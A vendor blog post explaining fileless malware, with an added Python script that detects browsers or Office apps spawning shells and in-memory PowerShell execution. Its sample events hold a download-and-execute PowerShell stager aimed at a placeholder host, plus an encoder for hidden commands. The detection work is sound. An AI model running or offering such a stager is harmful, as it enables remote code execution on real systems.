Fileless Malware Demystified

Posted by Jordan Kadlec on May 5, 2017 12:08:17 PM

In a recent webinar hosted by WatchPoint, CEO Greg Edwards and Chief Hacking Officer Nathan Studebaker explained fileless malware. Fileless malware is a tactic that we have seen professional hackers use more and more over the last six months. In fact, the last quarter of 2016 saw a 33% increase in the distribution of fileless malware.

What is Fileless Malware?

The best way to describe fileless malware is to compare it to traditional malware, which we can see below.

Traditional Malware:

  • Visit a page
  • Download a file
  • File is written to the disk
  • File is scanned by antivirus
  • Antivirus blocks the file if its signature is recognized
  • Otherwise the file is executed and installs the malware

Fileless Malware:

  • Visit a page
  • Interact with the site
    • This can include visiting a web page, filling out a form, or clicking on a link
  • A shell is spawned
    • Typically PowerShell or cmd.exe, launched from the browser process by a script or exploit on the page. This is the first necessary component of fileless malware
  • The shell pulls down the malicious code and runs it entirely in RAM

What makes fileless malware so different is that the payload never touches your disk. Traditional malware is written to a file on disk, and that file is what your antivirus scans. With fileless malware nothing is written to disk, so there is nothing for a file-scanning antivirus to inspect, and the infection proceeds on your computer and/or server without being stopped. The practical consequence is that detection has to come from watching process behaviour, for example a browser spawning a shell that runs an encoded command, rather than from scanning files.
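The behavioural check described above, as an added example that is not part of the original post or of WatchPoint's product: it scores process-creation events for the "web-facing process spawns a shell" pivot and for command-line markers of code being fetched and run in memory, including markers hidden inside a PowerShell -EncodedCommand blob. The ProcessEvent fields, the marker list, the process names and all sample events are constructed for this example; the fields mirror what Sysmon Event ID 1 or EDR telemetry would provide, but no real log format is assumed.

```python
"""Added example (not WatchPoint code): flag the "shell spawned, code run in RAM"
pivot of the fileless chain in constructed process-creation events."""
import base64
import re
from dataclasses import dataclass

# Processes the user interacts with (browser, Office, mail, PDF reader). A shell
# spawned directly by one of these is the pivot step described in the post.
WEB_FACING_PARENTS = {
    "chrome.exe", "firefox.exe", "iexplore.exe", "msedge.exe",
    "winword.exe", "excel.exe", "outlook.exe", "acrord32.exe",
}
SHELLS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe",
}

# Command-line fragments that indicate code is fetched and executed in memory
# rather than dropped to disk. Matched case-insensitively against lower-cased text.
IN_MEMORY_MARKERS = {
    "invoke-expression": r"\biex\b|invoke-expression",
    "download-to-memory": r"downloadstring|invoke-webrequest",
    "base64-payload": r"frombase64string",
    "encoded-command": r"(?<!\w)-e(?:ncodedcommand|nc|c)?\s",
    "hidden-window": r"-w(?:indowstyle)?\s+hidden",
    "reflective-load": r"\[reflection\.assembly\]::load",
}

# PowerShell accepts -e, -ec, -enc and -EncodedCommand for a base64 UTF-16LE script.
ENC_RE = re.compile(r"(?<!\w)-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.I)


@dataclass
class ProcessEvent:
    parent_image: str   # e.g. "chrome.exe"
    image: str          # e.g. "powershell.exe"
    command_line: str


def expand_encoded_command(cmdline: str) -> str:
    """Replace a -EncodedCommand blob with its UTF-16LE plaintext so the markers
    hidden inside it become visible to the regexes. Undecodable blobs are left as-is."""
    def _decode(m: re.Match) -> str:
        try:
            return "-enc " + base64.b64decode(m.group(1)).decode("utf-16-le")
        except ValueError:          # bad base64 or not UTF-16 (binascii.Error is a ValueError)
            return m.group(0)
    return ENC_RE.sub(_decode, cmdline)


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """2 points for the web-facing-parent -> shell pivot, 1 per distinct in-memory marker."""
    score, reasons = 0, []
    if ev.parent_image.lower() in WEB_FACING_PARENTS and ev.image.lower() in SHELLS:
        score += 2
        reasons.append(f"{ev.parent_image} spawned {ev.image}")
    text = expand_encoded_command(ev.command_line).lower()
    for name, pattern in IN_MEMORY_MARKERS.items():
        if re.search(pattern, text):
            score += 1
            reasons.append(name)
    return score, reasons


def detect(events: list[ProcessEvent], threshold: int = 2) -> list[tuple[int, int, list[str]]]:
    """Return (index, score, reasons) for every event scoring at or above the threshold."""
    hits = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((i, score, reasons))
    return hits


def encode_powershell(script: str) -> str:
    """Build the -EncodedCommand form of a script, the way a stager would."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed download-and-run-in-memory one-liner (hostname is a reserved .invalid name).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"

# Constructed sample events: 0, 2 and 4 show the fileless pattern; 1 and 3 are benign.
SAMPLE_EVENTS = [
    ProcessEvent("chrome.exe", "powershell.exe",
                 "powershell.exe -nop -w hidden -enc " + encode_powershell(STAGER)),
    ProcessEvent("explorer.exe", "cmd.exe", "cmd.exe /c dir"),
    ProcessEvent("winword.exe", "cmd.exe",
                 'cmd.exe /c powershell -w hidden -c "' + STAGER.replace("a.ps1", "b.ps1") + '"'),
    ProcessEvent("services.exe", "powershell.exe",
                 r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    ProcessEvent("explorer.exe", "powershell.exe",
                 "powershell.exe -w hidden -enc " + encode_powershell(
                     STAGER.replace("IEX", "Invoke-Expression").replace("a.ps1", "c.ps1"))),
]

if __name__ == "__main__":
    for idx, score, reasons in detect(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{score}] {ev.parent_image} -> {ev.image}: {', '.join(reasons)}")
```

Event 4 is the reason the markers are scored separately from the parent-child pair: explorer.exe launching PowerShell is normal, but a hidden window plus an encoded command that decodes to a download-and-execute one-liner still crosses the threshold. The threshold of 2 flags a browser spawning any shell on its own, which is the right default for the pivot the post describes; tune it against your own baseline of parent-child pairs before alerting on it.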

Fileless Malware Demystified 

The webinar has been posted to YouTube; you can check it out here. Watch our cybersecurity experts walk step by step through the differences between traditional and fileless malware. Additionally, CEO Greg Edwards shows how our product, CryptoStopper, can protect you from becoming infected with fileless ransomware. Contact WatchPoint today to secure your business against ransomware of all kinds.

Topics: Fileless Malware, Malware, Fileless